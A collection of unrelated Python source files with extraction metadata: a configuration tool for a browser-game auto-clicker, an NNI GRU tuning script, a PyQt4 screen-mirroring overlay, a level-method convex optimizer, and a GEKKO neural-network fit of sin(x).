    print("------------------------")
    while True:
        try:
            return float(input("What speed should I click at? (Default: 1) "))
        except ValueError:
            print("You have to put a number greater than zero! Any other characters will not work (!#$&$*@), though you may put fractions (ex: .5, 1.5, 2.3)")
def confLoopMax():
    """Prompt for the scan count per refresh until a valid int is entered.

    Returns the value as an int.  The previous version retried only once
    and crashed with ValueError if the second attempt was also non-numeric.
    """
    print("------------------------")
    while True:
        try:
            return int(input("How many times should I scan the screen for planets before refreshing?: (default: 50) "))
        except ValueError:
            print("You have to put a number greater than zero! Any other characters will not work (!#$&$*@)")
def confxpos():
    """Interactively capture the X screen coordinate of each of the 9 planet columns.

    For every column the user hovers the mouse over the planet and presses W;
    the mouse X position is recorded.  Returns a list of 9 X coordinates.
    """
    import keyboard
    from pymouse import PyMouse
    mouse = PyMouse()
    print("------------------------")
    rowPrint(8, -1, -1, -1)
    print("We will now select the X Positions of the planets.")
    print("Please have your browser ready with the site open, and it is recommended that you maximize the window.")
    input("Press enter when ready: ")
    positions = []
    for column in range(9):
        print("------------------------")
        rowPrint(-1, -1, 8, column)
        print("Please press W when you have your mouse hovered over this planet.")
        keyboard.wait('w')
        positions.append(mouse.position()[0])
    return positions
def confypos():
    """Interactively capture the Y screen coordinate of each of the 9 planet rows.

    For every row the user hovers the mouse over the planet and presses W;
    the mouse Y position is recorded.  Returns a list of 9 Y coordinates.
    """
    import keyboard
    from pymouse import PyMouse
    mouse = PyMouse()
    print("------------------------")
    rowPrint(-1, 0, -1, -1)
    print("We will now select the Y Positions of the planets.")
    print("Please have your browser ready with the site open, and it is recommended that you maximize the window.")
    input("Press enter when ready: ")
    positions = []
    for row in range(9):
        print("------------------------")
        rowPrint(-1, -1, row, 0)
        print("Please press W when you have your mouse hovered over this planet.")
        keyboard.wait('w')
        positions.append(mouse.position()[1])
    return positions
def confRestartXY():
    """Interactively capture the screen position of the restart button.

    The user hovers the mouse over the button and presses W.
    Returns the position as [x, y].
    """
    import keyboard
    from pymouse import PyMouse
    mouse = PyMouse()
    print("------------------------")
    print("We will now select the position of the restart button.")
    print("Please have your browser ready with the site open, and it is recommended that you maximize the window.")
    print("For this step, you may have to complete a game of planet popper to correctly position the mouse.")
    input("Press enter when ready: ")
    print("Please press W when you have your mouse hovered over it.")
    keyboard.wait('w')
    point = mouse.position()
    return [point[0], point[1]]
def confRefreshXY():
    """Interactively capture the screen position of the browser URL bar.

    The bar is clicked periodically to refresh the site and clear glitches.
    The user hovers the mouse over it and presses W.  Returns [x, y].
    """
    import keyboard
    from pymouse import PyMouse
    mouse = PyMouse()
    print("------------------------")
    print("We will now select the position of the URL bar.")
    print("Please have your browser ready")
    print("For this step, you will hover your mouse over the URL bar.")
    print("This is to refresh the website every X loops to ensure any bugs do not occur.")
    input("Press enter when ready: ")
    print("Please press W when you have your mouse hovered over it.")
    keyboard.wait('w')
    point = mouse.position()
    return [point[0], point[1]]
def retry(currentJson):
    """Interactive settings editor: re-runs individual configuration steps
    until the user chooses to stop.

    currentJson - the settings dict being edited (mutated in place).
    Returns the (possibly updated) settings dict.
    NOTE(review): the menu advertises a "retry" option but no branch handles
    it, so typing "retry" falls through to "Invalid selection."
    """
    done = 0
    while done == 0:
        print("------------------------")
        print("Current Settings:")
        print(currentJson)
        print("------------------------")
        print("To redo configuration, type retry.")
        print("To edit the speed, type speed.")
        print("To edit the loopmax, type loopmax.")
        print("To edit the xpos, type xpos.")
        print("To edit the ypos, type ypos.")
        print("To edit the RestartXY, type RestartXY.")
        print("To edit the RefreshXY, type RefreshXY.")
        print("Type Cancel to cancel.")
        wrongSetting = str(input("Selection: ")).lower()
        if wrongSetting == "speed":
            currentJson['speed'] = confSpeed()
        elif wrongSetting == "loopmax":
            currentJson['loopmax'] = confLoopMax()
        elif wrongSetting == "xpos":
            currentJson['xpos'] = confxpos()
        elif wrongSetting == "ypos":
            # BUG FIX: previously stored under the misspelled key 'ypss',
            # so edited y positions were silently lost.
            currentJson['ypos'] = confypos()
        elif wrongSetting == "restartxy":
            currentJson['restartXY'] = confRestartXY()
        elif wrongSetting == "refreshxy":
            currentJson['refreshXY'] = confRefreshXY()
        elif wrongSetting == "cancel":
            done = 1
        else:
            print("Invalid selection.")
        if done != 1:
            print("Continue editing? Y/N: ")
            continuevar = str(input('')).lower()
            if continuevar == "n":
                done = 1
    return currentJson
#could use a switch statement
def checkConfirm(currentJson):
    """Show the current settings and ask the user to confirm them.

    On a "no" answer the interactive editor (retry) is launched.
    Returns the confirmed (possibly edited) settings dict.
    """
    print("------------------------")
    print("Current Settings:")
    print(currentJson)
    print("------------------------")
    print("Are these settings correct?")
    yes_words = ['y', 'ye', 'yes']
    no_words = ['n', 'no']
    answer = str(input("Type Y/Yes or N/No to select: ")).lower()
    # Re-prompt until the answer is recognizably yes or no
    while answer not in yes_words and answer not in no_words:
        answer = str(input("Type Y/Yes or N/No to select: ")).lower()
    if answer in yes_words:
        print("confirmed")
    else:
        currentJson = retry(currentJson)
    return currentJson
def configure(configFile):
    """Load an existing config.json (mode -1) or build a fresh one (mode 0)
    by walking the user through every configuration prompt, then save."""
    try:
        confJson=json.loads(configFile.read())
        print("Loaded current config")
        #print(confJson)
        cmode=-1
    except ValueError:
        # Missing/empty/corrupt JSON: fall through to a full first-time setup.
        print("Config file not correctly loaded. Creating...")
        cmode=0
    emptyConfig={"speed" : 0,
        "loopmax" : 0,
        "xpos" : [],
        "ypos" : [],
        "restartXY" : [],
        "refreshXY" : []}
    print("Entering mode %s"%(cmode))
    if cmode == 0:
        # Seed the file with an empty skeleton, then run every prompt.
        # NOTE(review): the file is open 'r+'/'w+', so this write lands at the
        # current file position left by read() — confirm this is intended.
        configFile.write(json.dumps(emptyConfig))
        confSpeedr=confSpeed()
        confLoopMaxrow=confLoopMax()
        currentSettings={"speed" : confSpeedr,
            "loopmax" : confLoopMaxrow,
            "xpos" : confxpos(),
            "ypos" : confypos(),
            "restartXY" : confRestartXY(),
            "refreshXY" : confRefreshXY()}
        print("Current settings: %s"%(currentSettings))
        print("Is this correct?")
        new=checkConfirm(currentSettings)
        saveJson(new)
    if cmode == -1:
        # Existing config: jump straight into the interactive editor.
        new=retry(confJson)
        saveJson(new)
if __name__ == '__main__':
    # Open config.json read/write; create it first if it doesn't exist yet.
    try:
        configFile=open('config.json','r+')
        configure(configFile)
    except IOError:
        configFile=open('config.json','w+')
        configure(configFile)
| [
"pymouse.PyMouse",
"keyboard.wait",
"json.dumps"
] | [((1645, 1654), 'pymouse.PyMouse', 'PyMouse', ([], {}), '()\n', (1652, 1654), False, 'from pymouse import PyMouse\n'), ((2282, 2291), 'pymouse.PyMouse', 'PyMouse', ([], {}), '()\n', (2289, 2291), False, 'from pymouse import PyMouse\n'), ((2924, 2933), 'pymouse.PyMouse', 'PyMouse', ([], {}), '()\n', (2931, 2933), False, 'from pymouse import PyMouse\n'), ((3378, 3396), 'keyboard.wait', 'keyboard.wait', (['"""w"""'], {}), "('w')\n", (3391, 3396), False, 'import keyboard\n'), ((3528, 3537), 'pymouse.PyMouse', 'PyMouse', ([], {}), '()\n', (3535, 3537), False, 'from pymouse import PyMouse\n'), ((3956, 3974), 'keyboard.wait', 'keyboard.wait', (['"""w"""'], {}), "('w')\n", (3969, 3974), False, 'import keyboard\n'), ((614, 637), 'json.dumps', 'json.dumps', (['currentJson'], {}), '(currentJson)\n', (624, 637), False, 'import json\n'), ((2133, 2151), 'keyboard.wait', 'keyboard.wait', (['"""w"""'], {}), "('w')\n", (2146, 2151), False, 'import keyboard\n'), ((2770, 2788), 'keyboard.wait', 'keyboard.wait', (['"""w"""'], {}), "('w')\n", (2783, 2788), False, 'import keyboard\n'), ((6968, 6991), 'json.dumps', 'json.dumps', (['emptyConfig'], {}), '(emptyConfig)\n', (6978, 6991), False, 'import json\n')] |
import sys
import nni
from sklearn.metrics import r2_score
sys.path.append('../..')
from model_layer.model_hub import GRU
from model_layer.model_tuner import RecurrentModelTuner
from utils import base_io
def main(model_class, future_index, params):
    """Tune `model_class` on the given futures index with `params`,
    scoring each trial by R-squared."""
    tuner = RecurrentModelTuner(
        model_class=model_class,
        future_index=future_index,
        target_metric_func=r2_score,
        metric_name='R_Square',
        params=params,
    )
    tuner.run()
if __name__ == '__main__':
    # Tuning target: the IC index future, modeled with a GRU network.
    future_index = 'IC'
    model_class = GRU
    # params = base_io.load_best_params(future_index, model_class.name)
    # Hyper-parameters for this trial are supplied by the NNI tuner.
    params = nni.get_next_parameter()
    main(model_class, future_index, params)
| [
"nni.get_next_parameter",
"sys.path.append",
"model_layer.model_tuner.RecurrentModelTuner"
] | [((66, 90), 'sys.path.append', 'sys.path.append', (['"""../.."""'], {}), "('../..')\n", (81, 90), False, 'import sys\n'), ((347, 506), 'model_layer.model_tuner.RecurrentModelTuner', 'RecurrentModelTuner', ([], {'model_class': 'model_class', 'future_index': 'future_index', 'target_metric_func': 'target_metric_func', 'metric_name': 'metric_name', 'params': 'params'}), '(model_class=model_class, future_index=future_index,\n target_metric_func=target_metric_func, metric_name=metric_name, params=\n params)\n', (366, 506), False, 'from model_layer.model_tuner import RecurrentModelTuner\n'), ((763, 787), 'nni.get_next_parameter', 'nni.get_next_parameter', ([], {}), '()\n', (785, 787), False, 'import nni\n')] |
import sys
from PyQt4 import QtGui, QtCore
class TopWindow(QtGui.QMainWindow):
    """Frameless, always-on-top window that continuously mirrors a 340x768
    strip of the desktop (starting at x=340) and quits on any mouse click."""
    def __init__(self):
        QtGui.QMainWindow.__init__(self)
        # Stay above all other windows, draw no frame, and bypass the window
        # manager (X11) so nothing can move or cover this window.
        self.setWindowFlags(
            QtCore.Qt.WindowStaysOnTopHint |
            QtCore.Qt.FramelessWindowHint |
            QtCore.Qt.X11BypassWindowManagerHint
        )
        # Pin a 340x768 window against the right edge of the screen.
        self.setGeometry(QtGui.QStyle.alignedRect(
            QtCore.Qt.LeftToRight, QtCore.Qt.AlignRight,
            QtCore.QSize(340, 768),
            QtGui.qApp.desktop().screenGeometry()))
        self.label = QtGui.QLabel(self)
        self.label.resize(self.size())
        self.redraw()
        # Refresh the mirrored region every 30 ms (~33 fps).
        self.timer = QtCore.QTimer()
        self.timer.timeout.connect(self.redraw)
        self.timer.start(30)
    def redraw(self):
        """Grab the whole desktop and display the 340-wide strip at x=340."""
        pixmap = QtGui.QPixmap.grabWindow(QtGui.QApplication.desktop().winId())
        self.label.setPixmap(pixmap.copy(340, 0, 340, 768))
    def mousePressEvent(self, event):
        # Any click inside the window quits the application.
        QtGui.qApp.quit()
# Entry point: create the Qt application, show the overlay, run the event loop.
app = QtGui.QApplication(sys.argv)
topWindow = TopWindow()
topWindow.show()
app.exec_()
| [
"PyQt4.QtGui.QApplication",
"PyQt4.QtGui.qApp.desktop",
"PyQt4.QtGui.QApplication.desktop",
"PyQt4.QtCore.QTimer",
"PyQt4.QtGui.QLabel",
"PyQt4.QtGui.qApp.quit",
"PyQt4.QtGui.QMainWindow.__init__",
"PyQt4.QtCore.QSize"
] | [((982, 1010), 'PyQt4.QtGui.QApplication', 'QtGui.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (1000, 1010), False, 'from PyQt4 import QtGui, QtCore\n'), ((112, 144), 'PyQt4.QtGui.QMainWindow.__init__', 'QtGui.QMainWindow.__init__', (['self'], {}), '(self)\n', (138, 144), False, 'from PyQt4 import QtGui, QtCore\n'), ((544, 562), 'PyQt4.QtGui.QLabel', 'QtGui.QLabel', (['self'], {}), '(self)\n', (556, 562), False, 'from PyQt4 import QtGui, QtCore\n'), ((646, 661), 'PyQt4.QtCore.QTimer', 'QtCore.QTimer', ([], {}), '()\n', (659, 661), False, 'from PyQt4 import QtGui, QtCore\n'), ((957, 974), 'PyQt4.QtGui.qApp.quit', 'QtGui.qApp.quit', ([], {}), '()\n', (972, 974), False, 'from PyQt4 import QtGui, QtCore\n'), ((446, 468), 'PyQt4.QtCore.QSize', 'QtCore.QSize', (['(340)', '(768)'], {}), '(340, 768)\n', (458, 468), False, 'from PyQt4 import QtGui, QtCore\n'), ((804, 832), 'PyQt4.QtGui.QApplication.desktop', 'QtGui.QApplication.desktop', ([], {}), '()\n', (830, 832), False, 'from PyQt4 import QtGui, QtCore\n'), ((482, 502), 'PyQt4.QtGui.qApp.desktop', 'QtGui.qApp.desktop', ([], {}), '()\n', (500, 502), False, 'from PyQt4 import QtGui, QtCore\n')] |
import numpy as np
import matplotlib.pyplot as plt
import math
from scipy.optimize import linprog
from cvxpy import *
class CuttingPlaneModel:
    """Piecewise-linear cutting-plane model of a convex function, built from
    (value, subgradient) pairs supplied by an oracle.

    Each stored row (c, g) encodes the supporting plane y >= c + g @ x.
    BUG FIX: project_point used `cvxpy.`-prefixed names, but the module only
    does `from cvxpy import *`, so every call raised NameError."""

    def __init__(self, dim, bounds):
        self.dim = dim
        self.bounds = bounds
        # One row per plane: (c, g_1, ..., g_dim)
        self.coefficients = np.empty((0, dim + 1))

    def __call__(self, x):
        """Evaluate the model at x: the max over all stored planes.
        Returns (value, 0) to mirror the oracle's (f, g) signature."""
        y = [np.sum(np.multiply(coefficients_i, np.hstack((1, x))))
             for coefficients_i in self.coefficients]
        return np.max(y), 0

    def get_constraints(self):
        """Return (A_x, A_y, b) encoding the epigraph constraints
        A_x @ x - y <= b.  (Generalized from the previous hard-coded
        2-D slice to any self.dim.)"""
        A_ub_x = np.asarray([list(c[1:]) for c in self.coefficients])
        A_ub_y = np.asarray([-1 for i in range(self.coefficients.shape[0])])
        b_ub = np.asarray([-c[0] for c in self.coefficients])
        return A_ub_x, A_ub_y, b_ub

    def add_plane(self, f, g, x):
        """Add the supporting plane of the function at x (value f, subgradient g)."""
        c = f - np.sum(np.multiply(g, x))
        new_plane = np.append(c, g)
        self.coefficients = np.append(self.coefficients, [new_plane], axis=0)

    def solve(self, lb, ub):
        """Minimize the current model.  Returns (x, y, on_border).
        When the unconstrained LP is unbounded/infeasible (too few planes),
        re-solve inside the [lb, ub] box and flag on_border=True."""
        A_ub_x, A_ub_y, b_ub = self.get_constraints()
        x = Variable(self.dim)
        y = Variable()
        constraints = [A_ub_x @ x + A_ub_y * y <= b_ub]
        objective = Minimize(y)
        problem = Problem(objective, constraints)
        problem.solve(verbose=False)
        on_border = problem.status in ['unbounded', 'infeasible']
        if problem.status == 'infeasible':
            print("Warning: Infeasible problem")
        if on_border:
            constraints.append([lb] * self.dim <= x)
            constraints.append(x <= [ub] * self.dim)
            problem = Problem(objective, constraints)
            problem.solve(verbose=False)
        return x.value, y.value, on_border

    def project_point(self, x0, level, max_distance_error=1e-2, verbose=False):
        """Euclidean projection of x0 onto the model's level set
        {x : model(x) == level}, via the QP min ||x - x0||^2."""
        n = len(x0)
        P = np.eye(n)
        q = np.multiply(x0, -2)
        # BUG FIX: use the star-imported cvxpy names (Variable, quad_form,
        # Minimize, Problem) instead of the unbound `cvxpy.` prefix.
        x = Variable(n)
        y = Variable()
        A_ub_x, A_ub_y, b_ub = self.get_constraints()
        # ||x - x0||^2 = x'Px + q'x + const
        objective = quad_form(x, P) + q.T @ x
        constraints = [A_ub_x @ x + A_ub_y * y <= b_ub, y == level]
        prob = Problem(Minimize(objective), constraints)
        prob.solve(verbose=verbose, max_iter=10**7, time_limit=5)
        if np.abs(level - y.value) > max_distance_error:
            print("Warning, projection error above threshold: ", np.abs(level - y.value))
        return x.value

    def plot(self, points=None, temp_points=None):
        """Contour-plot the model over the bounding box with optional markers.
        (Mutable default arguments replaced with None sentinels.)"""
        points = [] if points is None else points
        temp_points = [] if temp_points is None else temp_points
        plt.figure()
        xaxis = np.linspace(-self.bounds, self.bounds, num=100)
        yaxis = np.linspace(-self.bounds, self.bounds, num=100)
        result = np.zeros((len(xaxis), len(yaxis)))
        for i, x in enumerate(xaxis):
            for j, y in enumerate(yaxis):
                result[j, i], _ = self.__call__([x, y])
        plt.contour(xaxis, yaxis, result, 50)
        plt.colorbar()
        for p in temp_points:
            plt.plot(p[0], p[1], 'o', color='red')
        for i, p in enumerate(points):
            plt.plot(p[0], p[1], 'o', color='black')
            plt.text(p[0], p[1], str(i))
        plt.show()
class LevelMethod2d:
    """Level-bundle method for minimizing a 2-D convex function: builds a
    cutting-plane model and projects iterates onto its level sets."""

    def __init__(self, bounds=10, lambda_=0.29289, epsilon=0.001, max_iter=1000):
        self.bounds = bounds          # box half-width for the model LPs
        self.lambda_ = lambda_        # level parameter in (0, 1)
        self.epsilon = epsilon        # stopping tolerance on the gap
        # BUG FIX: the max_iter argument was ignored (hard-coded 1000).
        self.max_iter = max_iter
        self.function = None
        self.dim = None
        self.function_points = None   # cached grid of f values for plotting
        self.current_iter = None
        # Algorithm data
        self.f_upstar = None          # best function value seen so far
        self.f_substar = None         # current model minimum
        self.x_upstar = None
        self.x_substar = None
        self.x = None

    def cache_points(self, xaxis=None, yaxis=None):  # Todo, for x of dim n
        """Evaluate and cache the objective on a grid (plotting only)."""
        if xaxis is None:
            xaxis = np.linspace(-self.bounds, self.bounds, num=100)
        if yaxis is None:
            yaxis = np.linspace(-self.bounds, self.bounds, num=100)
        result = np.zeros((len(xaxis), len(yaxis)))
        for i, x in enumerate(xaxis):
            for j, y in enumerate(yaxis):
                result[j, i], _ = self.function([x, y])
        self.function_points = result

    def plot(self, points=None, temp_points=None):
        """Contour-plot the objective with iterate markers.
        (Mutable default arguments replaced with None sentinels.)"""
        points = [] if points is None else points
        temp_points = [] if temp_points is None else temp_points
        plt.figure()
        xaxis = np.linspace(-self.bounds, self.bounds, num=100)
        yaxis = np.linspace(-self.bounds, self.bounds, num=100)
        if self.function_points is None:
            self.cache_points(xaxis, yaxis)
        plt.contour(xaxis, yaxis, self.function_points, 50)
        plt.colorbar()
        for p in temp_points:
            plt.plot(p[0], p[1], 'o', color='red')
        for i, p in enumerate(points):
            plt.plot(p[0], p[1], 'o', color='black')
            plt.text(p[0], p[1], str(i))
        plt.show()

    def solve(self, function, x, verbose=False, plot=False):
        """Run the level method from start point x on `function`, an oracle
        returning (value, subgradient).  Stops when the optimality gap falls
        below epsilon or max_iter iterations are exceeded."""
        self.function = function
        self.dim = len(x)
        self.x = x
        # Build the cutting plane model
        self.model = CuttingPlaneModel(self.dim, self.bounds)
        plot_points = [x]
        self.f_upstar = math.inf
        self.x_upstar = None
        gap = math.inf
        self.current_iter = 0
        print(f"Iteration\tf*\t\tModel Min\t\tGap\t\tLevel\t Is on boder?")
        while gap > self.epsilon:
            # Oracle computes f and g, which refine the model
            current_f, current_g = function(self.x)
            self.model.add_plane(current_f, current_g, self.x)
            # Model minimum and incumbent (best-so-far) update
            self.x_substar, self.f_substar, is_on_border = self.model.solve(-self.bounds, self.bounds)
            if self.f_upstar > current_f:
                self.f_upstar = current_f
                self.x_upstar = self.x
            # Optimality gap and target level for the projection
            gap = self.f_upstar - self.f_substar
            level = self.f_substar + self.lambda_ * gap
            if gap < -0.1:
                print("Warning: Negative gap ", gap)
                break
            if is_on_border:
                # Target level is meaningless (model unbounded); jump to
                # the box-constrained model minimizer instead.
                self.x = self.x_substar
            else:
                self.x = self.model.project_point(self.x, level, verbose=verbose)
            print(f"{self.current_iter}\t\t{self.f_upstar:.6f}\t{self.f_substar:.6f}\t\t{gap:.6f}\t{level:.6f} {is_on_border}")
            if plot:
                plot_points.append(self.x)
                self.model.plot(plot_points)
                self.plot(plot_points)
            self.current_iter += 1
            if self.current_iter > self.max_iter:
                print("Warning: Maximum number of iterations reached.")
                break
if __name__ == "__main__":
    # Demo run: minimize the benchmark function starting from (-1, -3).
    from test_function import TestFunction
    solver = LevelMethod2d(bounds=20)
    solver.solve(TestFunction(), [-1, -3], plot=False)
| [
"numpy.abs",
"numpy.eye",
"numpy.multiply",
"numpy.hstack",
"matplotlib.pyplot.colorbar",
"numpy.asarray",
"matplotlib.pyplot.plot",
"numpy.max",
"numpy.append",
"matplotlib.pyplot.contour",
"matplotlib.pyplot.figure",
"numpy.linspace",
"numpy.empty",
"test_function.TestFunction",
"matpl... | [((261, 283), 'numpy.empty', 'np.empty', (['(0, dim + 1)'], {}), '((0, dim + 1))\n', (269, 283), True, 'import numpy as np\n'), ((501, 554), 'numpy.asarray', 'np.asarray', (['[[c[1], c[2]] for c in self.coefficients]'], {}), '([[c[1], c[2]] for c in self.coefficients])\n', (511, 554), True, 'import numpy as np\n'), ((646, 694), 'numpy.asarray', 'np.asarray', (['[(-c[0]) for c in self.coefficients]'], {}), '([(-c[0]) for c in self.coefficients])\n', (656, 694), True, 'import numpy as np\n'), ((825, 840), 'numpy.append', 'np.append', (['c', 'g'], {}), '(c, g)\n', (834, 840), True, 'import numpy as np\n'), ((868, 917), 'numpy.append', 'np.append', (['self.coefficients', '[new_plane]'], {'axis': '(0)'}), '(self.coefficients, [new_plane], axis=0)\n', (877, 917), True, 'import numpy as np\n'), ((2142, 2151), 'numpy.eye', 'np.eye', (['n'], {}), '(n)\n', (2148, 2151), True, 'import numpy as np\n'), ((2164, 2183), 'numpy.multiply', 'np.multiply', (['x0', '(-2)'], {}), '(x0, -2)\n', (2175, 2183), True, 'import numpy as np\n'), ((2884, 2896), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2894, 2896), True, 'import matplotlib.pyplot as plt\n'), ((2914, 2961), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (2925, 2961), True, 'import numpy as np\n'), ((2978, 3025), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (2989, 3025), True, 'import numpy as np\n'), ((3226, 3263), 'matplotlib.pyplot.contour', 'plt.contour', (['xaxis', 'yaxis', 'result', '(50)'], {}), '(xaxis, yaxis, result, 50)\n', (3237, 3263), True, 'import matplotlib.pyplot as plt\n'), ((3272, 3286), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (3284, 3286), True, 'import matplotlib.pyplot as plt\n'), ((3513, 3523), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3521, 3523), True, 'import 
matplotlib.pyplot as plt\n'), ((4585, 4597), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4595, 4597), True, 'import matplotlib.pyplot as plt\n'), ((4619, 4666), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (4630, 4666), True, 'import numpy as np\n'), ((4687, 4734), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (4698, 4734), True, 'import numpy as np\n'), ((4846, 4897), 'matplotlib.pyplot.contour', 'plt.contour', (['xaxis', 'yaxis', 'self.function_points', '(50)'], {}), '(xaxis, yaxis, self.function_points, 50)\n', (4857, 4897), True, 'import matplotlib.pyplot as plt\n'), ((4910, 4924), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (4922, 4924), True, 'import matplotlib.pyplot as plt\n'), ((5175, 5185), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5183, 5185), True, 'import matplotlib.pyplot as plt\n'), ((7238, 7252), 'test_function.TestFunction', 'TestFunction', ([], {}), '()\n', (7250, 7252), False, 'from test_function import TestFunction\n'), ((439, 448), 'numpy.max', 'np.max', (['y'], {}), '(y)\n', (445, 448), True, 'import numpy as np\n'), ((2673, 2696), 'numpy.abs', 'np.abs', (['(level - y.value)'], {}), '(level - y.value)\n', (2679, 2696), True, 'import numpy as np\n'), ((3330, 3368), 'matplotlib.pyplot.plot', 'plt.plot', (['p[0]', 'p[1]', '"""o"""'], {'color': '"""red"""'}), "(p[0], p[1], 'o', color='red')\n", (3338, 3368), True, 'import matplotlib.pyplot as plt\n'), ((3421, 3461), 'matplotlib.pyplot.plot', 'plt.plot', (['p[0]', 'p[1]', '"""o"""'], {'color': '"""black"""'}), "(p[0], p[1], 'o', color='black')\n", (3429, 3461), True, 'import matplotlib.pyplot as plt\n'), ((4158, 4205), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (4169, 4205), True, 'import numpy 
as np\n'), ((4252, 4299), 'numpy.linspace', 'np.linspace', (['(-self.bounds)', 'self.bounds'], {'num': '(100)'}), '(-self.bounds, self.bounds, num=100)\n', (4263, 4299), True, 'import numpy as np\n'), ((4976, 5014), 'matplotlib.pyplot.plot', 'plt.plot', (['p[0]', 'p[1]', '"""o"""'], {'color': '"""red"""'}), "(p[0], p[1], 'o', color='red')\n", (4984, 5014), True, 'import matplotlib.pyplot as plt\n'), ((5075, 5115), 'matplotlib.pyplot.plot', 'plt.plot', (['p[0]', 'p[1]', '"""o"""'], {'color': '"""black"""'}), "(p[0], p[1], 'o', color='black')\n", (5083, 5115), True, 'import matplotlib.pyplot as plt\n'), ((787, 804), 'numpy.multiply', 'np.multiply', (['g', 'x'], {}), '(g, x)\n', (798, 804), True, 'import numpy as np\n'), ((2782, 2805), 'numpy.abs', 'np.abs', (['(level - y.value)'], {}), '(level - y.value)\n', (2788, 2805), True, 'import numpy as np\n'), ((364, 381), 'numpy.hstack', 'np.hstack', (['(1, x)'], {}), '((1, x))\n', (373, 381), True, 'import numpy as np\n')] |
from gekko import GEKKO
import numpy as np
import matplotlib.pyplot as plt
# generate training data: 20 samples of one period of sin(x)
x = np.linspace(0.0,2*np.pi,20)
y = np.sin(x)
# option for fitting function
select = True # True / False
if select:
    # Size with cosine function
    nin = 1  # inputs
    n1 = 1   # hidden layer 1 (linear)
    n2 = 1   # hidden layer 2 (nonlinear)
    n3 = 1   # hidden layer 3 (linear)
    nout = 1 # outputs
else:
    # Size with hyperbolic tangent function
    nin = 1  # inputs
    n1 = 2   # hidden layer 1 (linear)
    n2 = 2   # hidden layer 2 (nonlinear)
    n3 = 2   # hidden layer 3 (linear)
    nout = 1 # outputs
# Initialize gekko: "train" is fitted to the data, "test" reuses the
# fitted weights to predict on a wider input range.
train = GEKKO()
test = GEKKO()
model = [train,test]
for m in model:
    # input(s)
    m.inpt = m.Param()
    # layer 1: linear weights applied to the input
    m.w1 = m.Array(m.FV, (nin,n1))
    m.l1 = [m.Intermediate(m.w1[0,i]*m.inpt) for i in range(n1)]
    # layer 2: nonlinear activation (cos or tanh) of an affine combination
    m.w2a = m.Array(m.FV, (n1,n2))
    m.w2b = m.Array(m.FV, (n1,n2))
    if select:
        m.l2 = [m.Intermediate(sum([m.cos(m.w2a[j,i]+m.w2b[j,i]*m.l1[j]) \
                                    for j in range(n1)])) for i in range(n2)]
    else:
        m.l2 = [m.Intermediate(sum([m.tanh(m.w2a[j,i]+m.w2b[j,i]*m.l1[j]) \
                                    for j in range(n1)])) for i in range(n2)]
    # layer 3: linear output weights
    m.w3 = m.Array(m.FV, (n2,n3))
    m.l3 = [m.Intermediate(sum([m.w3[j,i]*m.l2[j] \
                                for j in range(n2)])) for i in range(n3)]
    # output(s): sum of the last layer
    m.outpt = m.CV()
    m.Equation(m.outpt==sum([m.l3[i] for i in range(n3)]))
    # flatten matrices so weights can be indexed with a single subscript
    m.w1 = m.w1.flatten()
    m.w2a = m.w2a.flatten()
    m.w2b = m.w2b.flatten()
    m.w3 = m.w3.flatten()
# Fit parameter weights on the training data.
# Per GEKKO conventions: STATUS=1 lets the optimizer adjust the value,
# FSTATUS=1 makes the solver take MEAS as the measured/initial value.
m = train
m.inpt.value=x
m.outpt.value=y
m.outpt.FSTATUS = 1
for i in range(len(m.w1)):
    m.w1[i].FSTATUS=1
    m.w1[i].STATUS=1
    m.w1[i].MEAS=1.0
for i in range(len(m.w2a)):
    m.w2a[i].STATUS=1
    m.w2b[i].STATUS=1
    m.w2a[i].FSTATUS=1
    m.w2b[i].FSTATUS=1
    m.w2a[i].MEAS=1.0
    m.w2b[i].MEAS=0.5
for i in range(len(m.w3)):
    m.w3[i].FSTATUS=1
    m.w3[i].STATUS=1
    m.w3[i].MEAS=1.0
# IMODE=2: model-parameter regression; EV_TYPE=2: squared-error objective
# (per the GEKKO documentation).
m.options.IMODE = 2
m.options.SOLVER = 3
m.options.EV_TYPE = 2
m.solve(disp=False)
# Test sample points: copy the fitted weights (NEWVAL) into the test
# model as fixed measurements, then evaluate on an extended x range.
m = test
for i in range(len(m.w1)):
    m.w1[i].MEAS=train.w1[i].NEWVAL
    m.w1[i].FSTATUS = 1
    print('w1['+str(i)+']: '+str(m.w1[i].MEAS))
for i in range(len(m.w2a)):
    m.w2a[i].MEAS=train.w2a[i].NEWVAL
    m.w2b[i].MEAS=train.w2b[i].NEWVAL
    m.w2a[i].FSTATUS = 1
    m.w2b[i].FSTATUS = 1
    print('w2a['+str(i)+']: '+str(m.w2a[i].MEAS))
    print('w2b['+str(i)+']: '+str(m.w2b[i].MEAS))
for i in range(len(m.w3)):
    m.w3[i].MEAS=train.w3[i].NEWVAL
    m.w3[i].FSTATUS = 1
    print('w3['+str(i)+']: '+str(m.w3[i].MEAS))
# Predict over [-2*pi, 4*pi] to see extrapolation beyond the training range.
m.inpt.value=np.linspace(-2*np.pi,4*np.pi,100)
m.options.IMODE = 2
m.options.SOLVER = 3
m.solve(disp=False)
# Plot the training data against the network prediction.
plt.figure()
plt.plot(x,y,'bo',label='data')
plt.plot(test.inpt.value,test.outpt.value,'r-',label='predict')
plt.legend(loc='best')
plt.ylabel('y')
plt.xlabel('x')
plt.show()
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"gekko.GEKKO",
"numpy.linspace",
"matplotlib.pyplot.figure",
"numpy.sin",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
